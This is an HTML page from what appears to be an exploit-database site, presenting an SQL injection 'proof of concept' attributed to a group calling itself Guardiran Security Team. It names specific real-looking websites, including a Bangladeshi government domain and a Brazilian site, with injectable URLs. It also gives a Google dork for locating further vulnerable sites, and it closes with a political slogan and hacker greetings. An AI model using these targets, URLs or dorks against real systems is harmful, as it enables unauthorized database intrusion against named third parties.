<html>
    <head>
        <link rel="shortcut icon" href="https://mr-msa.xyz/IMG/icon.png" type="image/x-icon">
        <style>
            html
            {
                background-color:black;
            }
            pre
            {
                color:green;
                font-size:11pt;
            }
            a
            {
                text-decoration:none;
            }
            button
            {
                background-color:green;
                width:200px;
                height:40px;
                color:#FFF;
                border:1px solid #999;
                border-radius:4px;
                
            }
            .back
            {
                width:60px;
            }
        </style>
        <title>exploit-4</title>
    </head>
    <body>
        <center>
                <a  href="https://mr-msa.xyz/guexdb/exploits/exploit-4" download>
                    <button>
                    Download
                    </button>
                </a>
                <a href="../database">
                    <button class="back">
                    Back
                    </button>
                </a>
        </center>
        <pre>
            ############################################
# Title :  web Design Select_Item sites www.bpc.gov.bd sql injection
# Author : Guardiran Security Team
# category : webapps
# Tested On : Win 8 , Kali Linux
# my team:guardiran.org/profile/25294-rednofozi/ 
# me : Rednofozi@yahoo.com
# Vendor HomePage : www.bpc.gov.bd
# Google Dork:"Web " Select_Item.php?id=
############################################

# search google Dork : ""Web " Select_Item.php?id=

####################Proof of Concept #############



#Demo :
http://www.bpc.gov.bd/contactus.php?id=1' [Sql injection Vulnerability]
 
http://www.walpax.com.br/beachresorts.php?id=100'[Sql injection Vulnerability]

# Discovered by : Rednofozi


#Long live SistanAs long as I live in my body, I defend this soilLong live Seyyed Ali Khamenei


#--tnx to :REX , DeMoN, C0d3!Nj3ct!0n ,Mr.Python , virtual_hate Comrade?, JOK3R ,  Ruiner , mr_null -  1TED
        </pre>
    </body>
</html>